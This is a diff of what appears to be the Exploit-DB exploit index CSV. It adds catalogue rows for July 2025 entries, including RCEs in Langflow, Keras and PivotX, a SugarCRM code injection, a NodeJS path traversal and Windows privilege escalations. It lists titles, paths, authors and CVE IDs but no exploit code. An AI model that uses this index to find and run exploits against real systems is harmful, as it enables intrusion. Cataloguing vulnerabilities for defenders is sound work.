+52364,exploits/multiple/webapps/52364.py,"Langflow 1.2.x - Remote Code Execution (RCE)",2025-07-16,"Raghad Abdallah Al-syouf",webapps,multiple,,2025-07-16,2025-07-16,0,CVE-2025-3248,,,,, 49733,exploits/multiple/webapps/49733.txt,"Latrix 0.6.0 - 'txtaccesscode' SQL Injection",2021-04-01,cptsticky,webapps,multiple,,2021-04-01,2021-04-01,0,,,,,, 48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple,,2020-05-11,2020-05-11,0,,,,,, 49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,, @@ -12324,6 +12327,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52194,exploits/multiple/webapps/52194.py,"Pimcore 11.4.2 - Stored cross site scripting",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11954,,,,, 35623,exploits/multiple/webapps/35623.txt,"Pimcore CMS 2.3.0/3.0 - SQL Injection",2014-12-27,Vulnerability-Lab,webapps,multiple,,2014-12-27,2014-12-27,0,OSVDB-116460,,,,, 52193,exploits/multiple/webapps/52193.py,"Pimcore customer-data-framework 4.2.0 - SQL injection",2025-04-14,maeitsec,webapps,multiple,,2025-04-14,2025-04-14,0,CVE-2024-11956,,,,, +52361,exploits/multiple/webapps/52361.txt,"PivotX 3.0.0 RC3 - Remote Code Execution (RCE)",2025-07-16,HayToN,webapps,multiple,,2025-07-16,2025-07-16,0,CVE-2025-52367,,,,, 49519,exploits/multiple/webapps/49519.html,"Pixelimity 1.0 - 'password' Cross-Site Request Forgery",2021-02-03,Noth,webapps,multiple,,2021-02-03,2021-02-03,0,CVE-2020-23522,,,,, 52211,exploits/multiple/webapps/52211.txt,"Plane 0.23.1 - Server side request forgery (SSRF)",2025-04-15,"Saud Alenazi",webapps,multiple,,2025-04-15,2025-04-15,0,,,,,, 50426,exploits/multiple/webapps/50426.txt,"Plastic SCM 10.0.16.5622 - WebAdmin Server Access",2021-10-18,"Basavaraj Banakar",webapps,multiple,,2021-10-18,2021-10-18,0,CVE-2021-41382,,,,, @@ -12443,6 +12447,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49832,exploits/multiple/webapps/49832.js,"StudyMD 0.3.2 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,, 14101,exploits/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,webapps,multiple,80,2010-06-28,2010-06-28,1,,,,,, 35214,exploits/multiple/webapps/35214.txt,"Subex Fms 7.4 - SQL Injection",2014-11-11,"Anastasios Monachos",webapps,multiple,,2014-11-17,2014-11-17,0,CVE-2014-8728;OSVDB-110747,,,,, +52365,exploits/multiple/webapps/52365.txt,"SugarCRM 14.0.0 - SSRF/Code Injection",2025-07-16,"Egidio Romano",webapps,multiple,,2025-07-16,2025-07-16,0,CVE-2024-58258,,,,,https://karmainsecurity.com/pocs/CVE-2024-58258.sh 51340,exploits/multiple/webapps/51340.txt,"Suprema BioStar 2 v2.8.16 - SQL Injection",2023-04-08,"Yuriy (Vander) Tsarenko",webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-27167,,,,, 51804,exploits/multiple/webapps/51804.txt,"SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration",2024-02-19,"Jonas Benjamin Friedli",webapps,multiple,,2024-02-19,2024-02-19,0,CVE-2023-3897,,,,, 52286,exploits/multiple/webapps/52286.txt,"SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation",2025-05-09,"Abdualhadi khalifa",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-27007,,,,,https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/ @@ -12527,6 +12532,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple,,2020-04-06,2020-04-06,0,CVE-2019-18426,,,,, 51781,exploits/multiple/webapps/51781.txt,"WhatsUp Gold 2022 (22.1.0 Build 39) - XSS",2024-02-05,"Andreas Finstad",webapps,multiple,,2024-02-05,2024-02-05,0,,,,,, 50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",2021-10-01,"Andreas Finstad",webapps,multiple,,2021-10-01,2021-10-01,0,CVE-2021-41318,,,,, +52367,exploits/multiple/webapps/52367.txt,"White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)",2025-07-16,"Imraan Khan (Lich-Sec)",webapps,multiple,,2025-07-16,2025-07-16,0,CVE-2025-44177,,,,, 10821,exploits/multiple/webapps/10821.txt,"Wing FTP Server 3.2.4 - Cross-Site Request Forgery",2009-12-30,Ams,webapps,multiple,,2009-12-29,,0,,,,,, 48154,exploits/multiple/webapps/48154.sh,"Wing FTP Server 6.2.5 - Privilege Escalation",2020-03-02,"Cary Hooper",webapps,multiple,,2020-03-02,2020-03-02,0,,,,,, 43441,exploits/multiple/webapps/43441.txt,"WinMX < 2.6 - Design Error",2003-06-02,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00006,,,,,http://gulftech.org/advisories/WinMX%20Design%20Error/6 @@ -12549,6 +12555,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5341.php 40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-07-20,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5343.php 40133,exploits/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation",2016-07-20,LiquidWorm,webapps,multiple,8088,2016-07-20,2016-12-03,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5340.php +52368,exploits/multiple/webapps/52368.txt,"WP Publications WordPress Plugin 1.2 - Stored XSS",2025-07-16,"Zeynalxan Quliyev",webapps,multiple,,2025-07-16,2025-07-16,0,CVE-2024-11605,,,,, 50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",2021-09-02,Sentinal920,webapps,multiple,,2021-09-02,2021-09-02,0,,,,,http://www.exploit-db.comwpanel4-cms-4.3.1.zip, 9730,exploits/multiple/webapps/9730.txt,"WX Guestbook 1.1.208 - SQL Injection / Persistent Cross-Site Scripting",2009-09-21,learn3r,webapps,multiple,,2009-09-20,,1,OSVDB-58262;CVE-2009-3328;OSVDB-58261;OSVDB-58260;CVE-2009-3327,,,,, 50113,exploits/multiple/webapps/50113.txt,"Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE)",2021-07-08,"Patrik Lantz",webapps,multiple,,2021-07-08,2021-07-08,0,,,,,, @@ -12605,6 +12612,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 23587,exploits/netware/remote/23587.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - snoop.jsp Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",remote,netware,,2004-01-23,2012-12-23,1,CVE-2004-2104;OSVDB-3720,,,,,https://www.securityfocus.com/bid/9479/info 23588,exploits/netware/remote/23588.txt,"Novell Netware Enterprise Web Server 5.1/6.0 SnoopServlet - Information Disclosure",2004-01-23,"Rafel Ivgi The-Insider",remote,netware,,2004-01-23,2012-12-23,1,CVE-2004-2104;OSVDB-3721,,,,,https://www.securityfocus.com/bid/9479/info 52276,exploits/nodejs/local/52276.py,"unzip-stream 0.3.1 - Arbitrary File Write",2025-04-30,cybersploit,local,nodejs,,2025-04-30,2025-04-30,0,CVE-2024-42471,,,,,https://themcsam.github.io/posts/unzip-stream-PoC/ +52369,exploits/nodejs/remote/52369.py,"NodeJS 24.x - Path Traversal",2025-07-16,"Abdualhadi khalifa",remote,nodejs,,2025-07-16,2025-07-16,0,CVE-2025-27210,,,,, 43054,exploits/nodejs/webapps/43054.txt,"KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting",2017-10-25,"Ishaq Mohammed",webapps,nodejs,,2017-10-25,2017-10-25,0,CVE-2017-15878,,,,, 43053,exploits/nodejs/webapps/43053.txt,"KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection",2017-10-25,"Ishaq Mohammed",webapps,nodejs,,2017-10-25,2017-10-25,0,CVE-2017-15879,,,,, 43922,exploits/nodejs/webapps/43922.html,"KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery",2018-01-28,"Saurabh Banawar",webapps,nodejs,,2018-01-28,2018-01-28,0,CVE-2017-16570,,,,, @@ -35198,6 +35206,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",2022-01-05,"Jeremiasz Pluta",remote,python,,2022-01-05,2022-01-05,0,CVE-2021-43857,,,,, 42599,exploits/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,remote,python,,2017-08-31,2017-09-01,1,CVE-2017-1000117,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/202c936868328a4fe665c9d2ea82b8f8a2610b6e/modules/exploits/multi/http/git_submodule_command_exec.rb 52227,exploits/python/remote/52227.txt,"Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)",2025-04-16,"The Kernel Panic",remote,python,,2025-04-16,2025-04-16,0,CVE-2024-11392,,,,,https://drive.google.com/file/d/14bnNaCRmFOQvPHUR9zQwdbjMmzKE2pZl/view?usp=drive_link +52359,exploits/python/remote/52359.py,"Keras 2.15 - Remote Code Execution (RCE)",2025-07-16,"Mohammed Idrees Banyamer",remote,python,,2025-07-16,2025-07-16,0,CVE-2025-1550,,,,, 41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,,2017-03-24,2017-04-04,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/a93aef8b7adecc4059c6cf168dd181e169cbc0b2/modules/exploits/linux/http/logsign_exec.rb 46075,exploits/python/remote/46075.rb,"Mailcleaner - (Authenticated) Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443,2019-01-07,2019-03-17,0,,"Metasploit Framework (MSF)",,,, 41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22,2017-04-27,2017-04-27,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/bbee7f86b5c1bd8b2e245b98fce1cb858b327948/modules/exploits/linux/ssh/mercurial_ssh_exec.rb @@ -41052,6 +41061,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 14745,exploits/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,1,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,, 40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-12-04-at-205544.png,, 45354,exploits/windows/local/45354.txt,"Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection",2018-09-10,hyp3rlinx,local,windows,,2018-09-10,2018-09-10,0,,,,,, +52360,exploits/windows/local/52360.txt,"Microsoft Brokering File System Windows 11 Version 22H2 - Elevation of Privilege",2025-07-16,nu11secur1ty,local,windows,,2025-07-16,2025-07-16,0,CVE-2025-49677,,,,, 19789,exploits/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Local Buffer Overflow",2000-03-06,dildog,local,windows,,2000-03-06,2012-07-16,1,CVE-2000-0200;OSVDB-1244,,,,,https://www.securityfocus.com/bid/1034/info 44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows,,2018-06-18,2018-06-18,0,CVE-2018-0824,Local,UnmarshalPwn,,,https://codewhitesec.blogspot.com/2018/06/cve-2018-0624.html 19425,exploits/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (2)",1999-07-19,"Wanderley J. Abreu Jr",local,windows,,1999-07-19,2012-06-27,1,CVE-1999-1011;OSVDB-272,,,,,https://www.securityfocus.com/bid/529/info @@ -41083,6 +41093,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43017,exploits/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,local,windows,,2017-10-19,2017-10-19,0,,,,,, 50776,exploits/windows/local/50776.txt,"Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path",2022-02-21,"Johto Robbie",local,windows,,2022-02-21,2022-02-21,0,,,,,, 49214,exploits/windows/local/49214.txt,"Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path",2020-12-08,"Ismael Nava",local,windows,,2020-12-08,2021-02-18,0,,,,,, +52362,exploits/windows/local/52362.txt,"Microsoft Graphics Component Windows 11 Pro (Build 26100+) - Local Elevation of Privileges",2025-07-16,nu11secur1ty,local,windows,,2025-07-16,2025-07-16,0,CVE-2025-49744,,,,, 14758,exploits/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,1,CVE-2010-3139;OSVDB-67535,,,,, 3149,exploits/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow",2007-01-17,porkythepig,local,windows,,2007-01-16,,1,OSVDB-31899;CVE-2007-0427;OSVDB-31898;CVE-2007-0352,,,,, 3159,exploits/windows/local/3159.cpp,"Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow",2007-01-19,porkythepig,local,windows,,2007-01-18,2016-09-20,1,CVE-2007-0427,,,,, @@ -44538,7 +44549,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 32339,exploits/windows/remote/32339.txt,"Microsoft Organization Chart 2 - Remote Code Execution",2008-09-08,"Ivan Sanchez",remote,windows,,2008-09-08,2014-03-19,1,CVE-2008-3956;OSVDB-48000,,,,,https://www.securityfocus.com/bid/31059/info 16700,exploits/windows/remote/16700.rb,"Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2010-0266;OSVDB-66296;MS10-045,"Metasploit Framework (MSF)",,,,http://www.akitasecurity.nl/advisory.php?id=AK20091001 16699,exploits/windows/remote/16699.rb,"Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)",2010-09-20,Metasploit,remote,windows,,2010-09-20,2011-03-10,1,CVE-2010-0266;OSVDB-66296;MS10-045,"Metasploit Framework (MSF)",,,,http://www.akitasecurity.nl/advisory.php?id=AK20091001 -52356,exploits/windows/remote/52356.txt,"Microsoft Outlook - Remote Code Execution (RCE)",2025-07-08,nu11secur1ty,remote,windows,,2025-07-08,2025-07-08,0,,,,,, +52356,exploits/windows/remote/52356.txt,"Microsoft Outlook - Remote Code Execution (RCE)",2025-07-08,nu11secur1ty,remote,windows,,2025-07-08,2025-07-16,0,CVE-2025-47171,,,,, 20571,exploits/windows/remote/20571.txt,"Microsoft Outlook 2000 0/98 0/Express 5.5 - Concealed Attachment",2001-01-17,http-equiv,remote,windows,,2001-01-17,2012-08-27,1,OSVDB-85833,,,,,https://www.securityfocus.com/bid/2260/info 23796,exploits/windows/remote/23796.html,"Microsoft Outlook 2002 - 'Mailto' Quoting Zone Bypass",2004-03-09,shaun2k2,remote,windows,,2004-03-09,2013-01-01,1,CVE-2004-0121;OSVDB-4168,,,,,https://www.securityfocus.com/bid/9827/info 24114,exploits/windows/remote/24114.html,"Microsoft Outlook 2003 - Mail Client E-mail Address Verification",2004-05-11,http-equiv,remote,windows,,2004-05-11,2013-01-15,1,CVE-2004-0501;OSVDB-6079,,,,,https://www.securityfocus.com/bid/10323/info